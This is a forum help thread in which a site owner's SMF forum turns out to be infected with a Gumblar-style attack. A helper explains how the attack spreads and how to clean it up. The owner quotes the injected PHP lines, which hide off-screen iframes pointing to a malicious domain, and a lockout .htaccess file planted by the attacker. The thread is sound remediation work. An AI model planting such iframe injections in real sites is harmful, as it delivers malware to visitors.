I can't log in nor make a new post please help

[perfec2]

Sorry I meant cut htacess From the "Backups folder" to SMF(rootfolder).
I  meant I opened the url in new browser after changes were made.
I am not using any software.
Link to see the small box http://africatopforum.com/index.php/topic,1766.0.html

[Norv]

I don't see the text you mention in my browser (using Opera 10), though there seem to be a few things on page that did not load.
Could you please make a screenshot? What browser are you using?

ETA: Ah. It seems actually that your site has been hacked, with a variant of the gumblar iframe malware.
Please check out:
http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

This is known as the Gumblar/FTP attack, and it works by infecting sites with a code redirecting the visitor's browsers to a malicious site (in this case, 'hulmeux.com' is the malicious domain, but there are countless others). As you (or anybody else) visits your site, their browser is redirected to this site. This site your browser is redirected to downloads scripts on the users computers and attempts to execute them using various vulnerabilities in its software. In case it succeeds, it implants one or more scripts (trojan-like) that steal their victim computers the passwords they find in, for example, FTP clients. The malicious users or scripts receiving the passwords connect to user's FTP accounts and infect everything they find there.
In other words: your computer, or someone else's with admin/FTP access to your site were infected with a keylogger, and this is how your site was hacked.
Please check out also:
http://news.cnet.com/8301-1009_3-10244529-83.html
And more on the web.

Security recommendations: clean up your computer and any other computer that has FTP access. Change your passwords to everything as soon as possible, from a secured computer. Same for any admin/person with FTP access.

Make sure to also cleanup your files:
- option 1: download all files, search in all the text '<iframe' and if you find a line that mentions a site like 'hulmeux.com' or another site you didn't hear of (so you didn't put it there) then remove the line, and save the file. Same for all files. Then put them back on your web space.
- option 2: download your attachments, avatars, gallery folders if any, to keep them safe. Then remove all files from your site, except Settings.php and Settings.bak.php (open these to make sure they have nothing like the 'iframe' or 'hulmeux' - if they do, remove that line). Download and unzip a large upgrade package and upload all files in your SMF folder. Then re-add attachments in the proper folder and everything else you have saved before.

[perfec2]

working by first option I am able to locate the files in question on Index.php and index.php~ respectively.
echo "<script>document.write('<iframe src=\"http:// hulmeux.com/?click=12661703\" width=100 height=100 style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>";

echo "<script>document.write('<iframe src=\"http:// hulmeux.com/?click=12713781\" width=100 height=100 style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>";
The small boxes are no more there.My system is personal computer use only by me. How could this incident of attach could be avoid?
There is no htaccess in the root folder(smf) now does this impose any danger and what would I do about it to get one?

[Norv]

I modified your post to make the links not-clickable.

My system is personal computer use only by me. How could this incident of attach could be avoid?

First of all, you need to get rid of it completely. Scan your computer with an up to date anti-malware tool. (or two, to be sure), make sure you change all your passwords, because right now, it is highly likely that your passwords are known to the malicious users/scripts.
It's not only you, also, it's any other admin of your site or person with access to your FTP, if any. They need to do the same.

Second, you can try to keep your computer protected and your software up to date. These attacks from malicious websites can damage your computer (infect it, like this one most likely did), by taking advantage of vulnerabilities in the software you're running. For example, it was known (see in the above links) that it got into users computer through not-update Flash or Adobe products.

Third, you can try to run an antivirus tool that protects you from web attacks as well. But please don't expect it to do too much. I don't know what to recommend, I've used Kaspersky when I was still on Windows and it was really good on many aspects, but it can't protect you from everything from the web: in this instance, my computer was infected in the past with exactly this Gumblar-type malware, and Kaspersky tried to disinfect afterwards the loads of viruses that started pouring into my computer (without much success). Perhaps you can try to make sure you choose carefully what sites to browse, if that is possible at all.

Please see the links above for other recommendations or users experiences with this particular type of malware.

.htaccess in the root SMF folder: the default SMF installation does not have a .htaccess file. It may be possible it was put there by the malware, I don't know. If you still have a copy of the former file, please eventually feel free to let us know its contents, to see.

[perfec2]

Thank you for these information is really useful to me. it appears that the htacess was added there by the hacker this is the content below:
<Files *>
   Order Deny,Allow
   Deny from all
   Allow from localhost
</Files>
I changed my password through CPanel  immediately i log in through ftp  the hacked the site by redirecting it to another site, these events occured twice at my present. I have scanned my computer and have changed my password again.For since I changed the password I have see that again.
I am concern now if I log in with ftp it might occure again, I use fireftp and  core ftp i don't really know if that is the case?

[perfec2]

Thank you for all the time and patient to assist me in this challenges I faced.
I am currently working on the clean up side of the challenge.
Once again thank you and have a pleasant day.